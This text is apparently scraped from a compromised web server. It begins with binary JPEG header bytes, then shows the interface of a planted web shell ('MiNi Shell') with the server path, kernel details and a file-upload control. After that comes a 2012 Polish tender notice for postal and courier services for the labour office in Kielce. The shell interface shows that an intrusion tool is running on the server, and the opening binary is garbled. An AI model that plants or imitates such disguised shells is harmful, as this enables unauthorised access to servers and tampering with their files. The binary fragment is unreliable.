JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120227/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120227/45683-N-2012.html

<p class="kh_header"><b>Kielce: Świadczenie usług pocztowych w obrocie krajowym i zagranicznym, 
w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych o wadze powyżej 50 g, wysyłek paczek 
oraz usług kurierskich na rzecz Wojewódzkiego Urzędu Pracy w Kielcach</b><br>
<b>Numer ogłoszenia: 45683 - 2012; data zamieszczenia: 27.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy w Kielcach , ul. Witosa 86, 25-561 Kielce, woj. świętokrzyskie, tel. 041 3641600, faks 041 3641666.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.wup.kielce.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna samorządu województwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług pocztowych w obrocie krajowym i zagranicznym, 
w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych o wadze powyżej 50 g, wysyłek paczek 
oraz usług kurierskich na rzecz Wojewódzkiego Urzędu Pracy w Kielcach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług pocztowych w obrocie krajowym i zagranicznym, w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych o wadze powyżej 
50 g, wysyłek paczek, a także usług kurierskich, na rzecz Wojewódzkiego Urzędu 
Pracy w Kielcach. Przedmiot zamówienia podzielony został na 2 części. 

Część I - Przedmiotem zamówienia jest świadczenie usług pocztowych w zakresie przyjmowania, przemieszczania i doręczania krajowych oraz zagranicznych przesyłek listowych rejestrowanych i nierejestrowanych o wadze powyżej 50 g (ekonomicznych 
i priorytetowych) wraz z usługami komplementarnymi, krajowych i zagranicznych paczek pocztowych (ekonomicznych i priorytetowych) wraz z usługami komplementarnymi, przesyłek pobraniowych o wadze powyżej 50 g, przesyłek zwracanych po wyczerpaniu możliwości ich doręczenia. 
Termin realizacji zamówienia obejmuje okres od dnia podpisania umowy do dnia 31.12.2012 r.
Przekazanie przesyłek do wyekspediowania będzie każdorazowo dokumentowane (kwitowane) przez Wykonawcę w prowadzonych przez Zamawiającego rejestrach.
Wykonawca zobowiązany jest zapewnić bezpłatne formularze potwierdzeń odbioru.
W przypadkach przesyłek nadawanych na specjalnych zasadach wykonawca zobowiązany będzie do używania druków -za potwierdzeniem odbioru- odpowiednich do wykorzystania w postępowaniach administracyjnych zgodnie z Kodeksem postępowania administracyjnego z dnia 14 czerwca 1960 r. (Dz.U. 00 Nr 98 poz. 1071 j.t. z późn. zm.).  
Wykonawca będzie dostarczał do siedziby Zamawiającego pokwitowane przez adresata -potwierdzenie odbioru- niezwłocznie po dokonaniu doręczenia przesyłki nie później jednak , niż w ciągu 7 dni roboczych od dnia doręczenia.
W przypadku nieobecności adresata przedstawiciel Wykonawcy pozostawia zawiadomienie (pierwsze awizo) o próbie dostarczenia przesyłki ze wskazaniem gdzie i kiedy adresat może odebrać przesyłkę. Termin do odbioru przesyłki wynosi 14 dni liczonych od dnia następnego po dniu pozostawienia awiza, w tym terminie przesyłka awizowana jest ponownie. Po upływie terminu przesyłka zwracana jest Zamawiającemu wraz z podaniem przyczyny nieodebrania przez adresata.
Za wykonanie przedmiotu umowy Zamawiający będzie uiszczał opłatę, w formie opłaty z dołu, tj. bezgotówkowo, poprzez polecenie przelewu, w terminie późniejszym niż dzień nadania przesyłek, z zastrzeżeniem, iż obliczenia dokonuje się w ostatnim dniu okresu rozliczeniowego. 
Okres rozliczeniowy opłaty -z dołu- za usługi objęte przedmiotem zamówienia stanowić będzie miesiąc kalendarzowy. Rozliczenia pomiędzy Zamawiającym a Wykonawcą dokonywane będą na podstawie cen jednostkowych brutto za przesyłki pocztowe oraz faktyczną ilość przesyłek nadawanych i zwróconych w okresie rozliczeniowym 
od Zamawiającego, wynikającą z rejestrów Zamawiającego oraz dokumentów oddawczych Wykonawcy. 
Dane dotyczące ilości przesyłek poszczególnego rodzaju mają charakter wyłącznie szacunkowy. Przesyłki będą zlecane-wykonywane sukcesywnie w trakcie trwania umowy, 
a ich ilość w okresie realizacji umowy będzie różna i zależna od potrzeb Zamawiającego.
Szczegółowy opis przedmiotu zamówienia zamieszczony został w Rozdziale II SIWZ.
Część II - Przedmiotem zamówienia jest świadczenie usług kurierskich w zakresie przyjmowania, przemieszczania i doręczania krajowych i zagranicznych przesyłek kurierskich, w trybie - od drzwi do drzwi-, na rzecz Wojewódzkiego Urzędu Pracy 
w Kielcach. Termin realizacji zamówienia obejmuje okres od dnia podpisania umowy do dnia 31.12.2012 r.
 Przedmiot zamówienia obejmuje przesyłki listowe (dokumentowe) oraz paczki.
Wykonawca zapewni możliwość: zgłaszania przesyłek kurierskich do godziny 15.30 w dni robocze, przyjęcie zamówienia - zlecenia odbywać się będzie telefonicznie, zapewni także możliwość zamawiania kuriera na określoną godzinę. W przypadku uszkodzenia przesyłki w czasie transportu Wykonawca dostarczy ją do adresata wraz z protokołem opisującym powstałe uszkodzenia. 
Za wykonanie przedmiotu umowy Zamawiający będzie uiszczał opłatę, w formie opłaty z dołu, tj. bezgotówkowo, poprzez polecenie przelewu, w terminie późniejszym niż dzień nadania przesyłek, z zastrzeżeniem, iż obliczenia dokonuje się w ostatnim dniu okresu rozliczeniowego. 
Okres rozliczeniowy opłaty - z dołu -  za usługi objęte przedmiotem zamówienia stanowić będzie miesiąc kalendarzowy. Rozliczenia pomiędzy Zamawiającym a Wykonawcą dokonywane będą na podstawie cen jednostkowych brutto za przesyłki oraz faktyczną ilość przesyłek nadawanych i zwróconych w okresie rozliczeniowym od Zamawiającego, wynikającą z rejestrów Zamawiającego oraz dokumentów oddawczych Wykonawcy. 
Dane dotyczące ilości przesyłek poszczególnego rodzaju mają charakter wyłącznie szacunkowy. 
Szczegółowy opis przedmiotu zamówienia zamieszczony został w Rozdziale II SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 64.11.00.00-0, 64.10.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca przedłoży:

- dla części I zamówienia - aktualne zezwolenie na wykonywanie działalności pocztowej 
w zakresie przyjmowania, przemieszczania i doręczania przesyłek w obrocie krajowym 
i zagranicznym, wydane przez Prezesa Urzędu Komunikacji Elektronicznej zgodnie z art. 6 ustawy Prawo Pocztowe z dnia 12 czerwca 2003 r. (Dz.U. z 2008 r. Nr 189, poz.1159 ze zm.), którego termin upływa nie wcześniej niż 31 grudnia 2012 r. lub oświadczenie o ustawowym zwolnieniu z ww. zezwolenia. 

- dla części II zamówienia - zaświadczenie o wpisie do Rejestru operatorów pocztowych, zgodnie z art. 6 ustawy Prawo Pocztowe z dnia 12 czerwca 2003 r. (Dz.U. z 2008 r. Nr 189, poz. 1159 ze zm.), lub dołączy oświadczenie o ustawowym zwolnieniu z wpisu do ww. rejestru; 

Na potwierdzenie należy złożyć oświadczenie zgodnie z załącznikiem nr 5 do SIWZ oraz ww. dokumenty, analogicznie do poszczególnych części zamówienia.
Ocena spełniania warunku dokonana zostanie w oparciu o oświadczenie zgodnie z Załącznikiem nr 5 do SIWZ oraz ww. dokumenty według formuły spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dla części I zamówienia - warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje co najmniej jedną usługę polegającą na świadczeniu usług pocztowych w obrocie krajowym i zagranicznym, dla jednego podmiotu przez okres co najmniej 10 miesięcy, o wartości nie mniejszej niż 21 000,00 zł brutto każda.
Na potwierdzenie - dla obu części należy złożyć oświadczenie zgodnie z załącznikiem nr 5 do SIWZ. Dla części I zamówienia, dodatkowo należy przedłożyć wykaz usług zgodnie z załącznikiem nr 6 do SIWZ wraz z dokumentami potwierdzającymi, że te usługi zostały wykonane lub są wykonywane należycie.
Ocena spełniania warunku dokonana zostanie w oparciu o oświadczenie zgodnie z Załącznikiem nr 5 do SIWZ oraz ww. dokumenty według formuły spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie należy złożyć oświadczenie zgodnie z Załącznikiem nr 5 do SIWZ. Ocena spełniania warunku dokonana zostanie w oparciu o oświadczenie zgodnie z Załącznikiem nr 5 do SIWZ według formuły spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie należy złożyć oświadczenie zgodnie z Załącznikiem nr 5 do SIWZ. Ocena spełniania warunku dokonana zostanie w oparciu o oświadczenie zgodnie z Załącznikiem nr 5 do SIWZ według formuły spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie należy złożyć oświadczenie zgodnie z Załącznikiem nr 5 do SIWZ. Ocena spełniania warunku dokonana zostanie w oparciu o oświadczenie zgodnie z Załącznikiem nr 5 do SIWZ według formuły spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony Formularz oferty, zgodny z wzorem zawartym w SIWZ. Pełnomocnictwo do podpisania oferty i załączników, o ile prawo do reprezentowania Wykonawcy nie wynika z innych dokumentów złożonych wraz z ofertą. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia do oferty należy dołączyć pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego podpisane przez uprawnionych przedstawicieli pozostałych Wykonawców, upoważniające jednego z Wykonawców do reprezentowania pozostałych, ze wskazaniem zakresu czynności do jakich podejmowania pełnomocnik jest uprawniony. Informacja ws. skorzystania przez Wykonawcę z możliwości powierzenia wykonania zamówienia lub jego części podwykonawcom, oraz wskazania zakresu prac w obrębie zamówienia, którego wykonanie powierzy podwykonawcom</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Zmianę wynagrodzenia Wykonawcy określoną w umowie jako wartość progową umowy zawartej z Wykonawcą w wyniku niniejszego postępowania	- w wyniku ustawowych zmian urzędowo obowiązującej stawki podatku od towarów 
i usług (VAT) lub zmianą obowiązku podatkowego Wykonawcy.


2. Zmianę cen jednostkowych brutto poszczególnych pozycji wpisanych przez Wykonawcę w Formularzu Oferty, który stanowić będzie Załącznik do umowy	- w sytuacji spowodowanej zmianami cen, zgodnie z przedłożonym przez Wykonawcę dokumentem zatwierdzającym te zmiany przez Prezesa Urzędu Komunikacji Elektronicznej lub w sposób dopuszczony przez Prawo pocztowe,
- w przypadku wprowadzenia przez Wykonawcę 
w czasie trwania umowy, systemu upustowego dotyczącego przesyłek pocztowych realizowanych w ramach realizacji przedmiotu zamówienia, Wykonawca zobowiązuje się do opracowania w formie aneksu zasad przyznawania upustu od opłat za przesyłki.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.wup.kielce.pl/bip2/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Kielcach
ul. Witosa 86, 25-561 Kielce.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.03.2012 godzina 10:00, miejsce: Wojewódzki Urząd Pracy w Kielcach - Sekretariat
ul. Witosa 86, 25-561 Kielce.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie usług pocztowych w obrocie krajowym 
i zagranicznym, w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych o wadze powyżej 50 g, wysyłek paczek na rzecz Wojewódzkiego Urzędu Pracy 
w Kielcach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I - Przedmiotem zamówienia jest świadczenie usług pocztowych w zakresie przyjmowania, przemieszczania i doręczania krajowych oraz zagranicznych przesyłek listowych rejestrowanych i nierejestrowanych o wadze powyżej 50 g (ekonomicznych 
i priorytetowych) wraz z usługami komplementarnymi, krajowych i zagranicznych paczek pocztowych (ekonomicznych i priorytetowych) wraz z usługami komplementarnymi, przesyłek pobraniowych o wadze powyżej 50 g, przesyłek zwracanych po wyczerpaniu możliwości ich doręczenia. 
Termin realizacji zamówienia obejmuje okres od dnia podpisania umowy do dnia 31.12.2012 r.
Przekazanie przesyłek do wyekspediowania będzie każdorazowo dokumentowane (kwitowane) przez Wykonawcę w prowadzonych przez Zamawiającego rejestrach.
Wykonawca zobowiązany jest zapewnić bezpłatne formularze potwierdzeń odbioru.
W przypadkach przesyłek nadawanych na specjalnych zasadach wykonawca zobowiązany będzie do używania druków -za potwierdzeniem odbioru- odpowiednich do wykorzystania w postępowaniach administracyjnych zgodnie z Kodeksem postępowania administracyjnego z dnia 14 czerwca 1960 r. (Dz.U. 00 Nr 98 poz. 1071 j.t. z późn. zm.).  
Wykonawca będzie dostarczał do siedziby Zamawiającego pokwitowane przez adresata -potwierdzenie odbioru- niezwłocznie po dokonaniu doręczenia przesyłki nie później jednak , niż w ciągu 7 dni roboczych od dnia doręczenia.
W przypadku nieobecności adresata przedstawiciel Wykonawcy pozostawia zawiadomienie (pierwsze awizo) o próbie dostarczenia przesyłki ze wskazaniem gdzie i kiedy adresat może odebrać przesyłkę. Termin do odbioru przesyłki wynosi 14 dni liczonych od dnia następnego po dniu pozostawienia awiza, w tym terminie przesyłka awizowana jest ponownie. Po upływie terminu przesyłka zwracana jest Zamawiającemu wraz z podaniem przyczyny nieodebrania przez adresata.
Za wykonanie przedmiotu umowy Zamawiający będzie uiszczał opłatę, w formie opłaty z dołu, tj. bezgotówkowo, poprzez polecenie przelewu, w terminie późniejszym niż dzień nadania przesyłek, z zastrzeżeniem, iż obliczenia dokonuje się w ostatnim dniu okresu rozliczeniowego. 
Okres rozliczeniowy opłaty -z dołu- za usługi objęte przedmiotem zamówienia stanowić będzie miesiąc kalendarzowy. Rozliczenia pomiędzy Zamawiającym a Wykonawcą dokonywane będą na podstawie cen jednostkowych brutto za przesyłki pocztowe oraz faktyczną ilość przesyłek nadawanych i zwróconych w okresie rozliczeniowym 
od Zamawiającego, wynikającą z rejestrów Zamawiającego oraz dokumentów oddawczych Wykonawcy. 
Dane dotyczące ilości przesyłek poszczególnego rodzaju mają charakter wyłącznie szacunkowy. Przesyłki będą zlecane-wykonywane sukcesywnie w trakcie trwania umowy, 
a ich ilość w okresie realizacji umowy będzie różna i zależna od potrzeb Zamawiającego.
Szczegółowy opis przedmiotu zamówienia zamieszczony został w Rozdziale II SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 64.11.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świadczenie usług kurierskich w zakresie przyjmowania, przemieszczania i doręczania krajowych i zagranicznych przesyłek kurierskich, na rzecz Wojewódzkiego Urzędu Pracy w Kielcach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II - Przedmiotem zamówienia jest świadczenie usług kurierskich w zakresie przyjmowania, przemieszczania i doręczania krajowych i zagranicznych przesyłek kurierskich, w trybie - od drzwi do drzwi-, na rzecz Wojewódzkiego Urzędu Pracy 
w Kielcach. Termin realizacji zamówienia obejmuje okres od dnia podpisania umowy do dnia 31.12.2012 r.
 Przedmiot zamówienia obejmuje przesyłki listowe (dokumentowe) oraz paczki.
Wykonawca zapewni możliwość: zgłaszania przesyłek kurierskich do godziny 15.30 w dni robocze, przyjęcie zamówienia - zlecenia odbywać się będzie telefonicznie, zapewni także możliwość zamawiania kuriera na określoną godzinę. W przypadku uszkodzenia przesyłki w czasie transportu Wykonawca dostarczy ją do adresata wraz z protokołem opisującym powstałe uszkodzenia. 
Za wykonanie przedmiotu umowy Zamawiający będzie uiszczał opłatę, w formie opłaty z dołu, tj. bezgotówkowo, poprzez polecenie przelewu, w terminie późniejszym niż dzień nadania przesyłek, z zastrzeżeniem, iż obliczenia dokonuje się w ostatnim dniu okresu rozliczeniowego. 
Okres rozliczeniowy opłaty - z dołu -  za usługi objęte przedmiotem zamówienia stanowić będzie miesiąc kalendarzowy. Rozliczenia pomiędzy Zamawiającym a Wykonawcą dokonywane będą na podstawie cen jednostkowych brutto za przesyłki oraz faktyczną ilość przesyłek nadawanych i zwróconych w okresie rozliczeniowym od Zamawiającego, wynikającą z rejestrów Zamawiającego oraz dokumentów oddawczych Wykonawcy. 
Dane dotyczące ilości przesyłek poszczególnego rodzaju mają charakter wyłącznie szacunkowy. 
